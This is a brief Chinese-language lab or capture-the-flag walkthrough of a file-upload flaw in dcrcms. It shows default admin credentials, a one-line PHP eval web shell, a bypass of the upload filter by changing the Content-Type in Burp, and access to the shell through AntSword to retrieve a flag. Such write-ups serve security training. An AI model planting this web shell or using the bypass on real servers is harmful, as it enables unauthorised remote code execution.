dcrcms 文件上传漏洞

dcrcms 文件上传漏洞

启动环境

启动靶场得到ip和映射端口
dcrcms 文件上传漏洞_第1张图片

测试漏洞

  1. 输入http://10.9.47.6:14153/dcr进入后台 账号密码为admin:123456
    dcrcms 文件上传漏洞_第2张图片
  2. 寻找文件上传漏洞
  • 看到添加新闻里有文件上传我们尝试进行上传
    dcrcms 文件上传漏洞_第3张图片
  • 写一个php文件里面放入一句话木马

@eval($_REQUEST[666]);
?>

dcrcms 文件上传漏洞_第4张图片
3. 将写好的一句话木马文件上传
dcrcms 文件上传漏洞_第5张图片
显示需要添加新闻类型我们添加一个
dcrcms 文件上传漏洞_第6张图片
这样就好了我们点击添加新闻
dcrcms 文件上传漏洞_第7张图片
显示类型不允许可能是把php文件屏蔽了
dcrcms 文件上传漏洞_第8张图片
我们用bp修改一下文件类型
dcrcms 文件上传漏洞_第9张图片
把他改为image/png
dcrcms 文件上传漏洞_第10张图片
这样就上传成功了我们到文件管理器找一下这个文件 文件管理器>uploads>news>当天日期的文件夹里
dcrcms 文件上传漏洞_第11张图片

dcrcms 文件上传漏洞_第12张图片
我们点击访问这个文件
dcrcms 文件上传漏洞_第13张图片
会跳出个其他IP
dcrcms 文件上传漏洞_第14张图片
我们将他改回靶场的ip和端口进行访问
dcrcms 文件上传漏洞_第15张图片
用蚁剑进行连接
dcrcms 文件上传漏洞_第16张图片
在蚁剑可以看到目录我们就可以找到flag了
dcrcms 文件上传漏洞_第17张图片
进行提交
dcrcms 文件上传漏洞_第18张图片

你可能感兴趣的:(靶场,后门,漏洞复现,web,web安全)